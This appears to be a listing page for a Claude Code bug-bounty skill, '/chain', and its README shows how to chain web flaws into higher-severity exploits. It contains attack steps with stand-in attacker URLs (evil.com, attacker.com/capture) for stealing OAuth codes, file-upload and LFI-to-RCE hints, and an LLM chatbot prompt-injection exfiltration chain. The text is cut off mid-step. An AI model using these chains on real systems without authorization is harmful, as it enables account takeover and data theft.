/chain banner
shuvonsec shuvonsec

/chain

Security community intermediate

Description

Build an A→B→C exploit chain for higher severity and payout.

Installation

This entry records only its repository, not the path inside it, so there is no exact command to give. Open the source below and copy the folder into ~/.claude/skills/, or the file into ~/.claude/agents/.

Repository README

This is the README for shuvonsec/claude-bug-bounty, shared by 16 entries in this directory. It describes the repository, not this entry specifically.


description: Build an exploit chain — given bug A, finds B and C to combine for higher severity and payout. Knows common chain patterns: IDOR→ATO, SSRF→cloud metadata, XSS→ATO, open redirect→OAuth theft, S3→bundle→secret→OAuth. Usage: /chain

/chain

Build an A→B→C exploit chain for higher severity and payout.

When to Use This

After confirming a standalone finding that:

  • Is on the "conditionally valid" list (open redirect, SSRF DNS-only, etc.)
  • Has been validated but classified as Low
  • Could be Medium or High if combined with another finding

Usage

/chain

Describe bug A when prompted. Include:

  • Bug class
  • Endpoint
  • What you can do with it
  • Target platform

The A→B Signal Table

If you found A, immediately check these B candidates:

Found A Immediately Check B Also Check C
IDOR on GET /api/user/X/orders IDOR on PUT/DELETE same path IDOR on ALL sibling endpoints
IDOR on /v2/ endpoint Same IDOR on /v1/ (missing fix) IDOR on mobile API
Auth bypass on one endpoint Every sibling in same controller Old API version
Stored XSS in user input Does admin view this? (priv esc) Email/export/PDF rendering
SSRF with DNS callback SSRF reaching internal services SSRF via open redirect
SQLi on one parameter Every parameter in same endpoint Same param type in sibling endpoints
File upload — PNG allowed Try SVG (XSS), HTML, PHP/JSP (RCE) Double extension: shell.php.jpg
OAuth missing PKCE CSRF on OAuth flow (state param?) Token reuse: auth_code exchanged twice?
Open redirect confirmed OAuth code theft via redirect_uri Phishing chain
GraphQL introspection Auth bypass on mutations IDOR via node(id)
Race condition on coupons Race on credits/wallet Race on rate limits
Exposed S3 listing JS bundles → grep API keys/OAuth .env files in bucket
Missing rate limit on OTP Brute force OTP directly Brute force password reset tokens
CSRF on sensitive action XSS→CSRF = Critical img src / form autosubmit
Path traversal LFI: /proc/self/environ or logs Log poisoning → RCE
Leaked API key in JS Call API as that key — what can it do? Other keys in same JS file
LLM chatbot prompt injection IDOR via chatbot (read other user's data) Exfil chain:

Common High-Value Chains

Chain 1: S3 → Bundle → Secret → OAuth (Coinbase Pattern)

1. S3 bucket public listing (Low)
2. Enumerate JS bundles from listing
3. grep bundles for OAuth client credentials
4. OAuth client secret = auth code exchange without PKCE
→ Result: 3 separate reports (S3: Low, OAuth secret: Med, PKCE: Med)

Chain 2: Open Redirect → OAuth Code Theft → ATO

1. Confirm open redirect: /redirect?to=https://evil.com
2. Find OAuth flow that uses redirect_uri
3. Set redirect_uri = /redirect?to=https://attacker.com/capture
4. Victim authorizes → code sent to attacker.com
5. Exchange co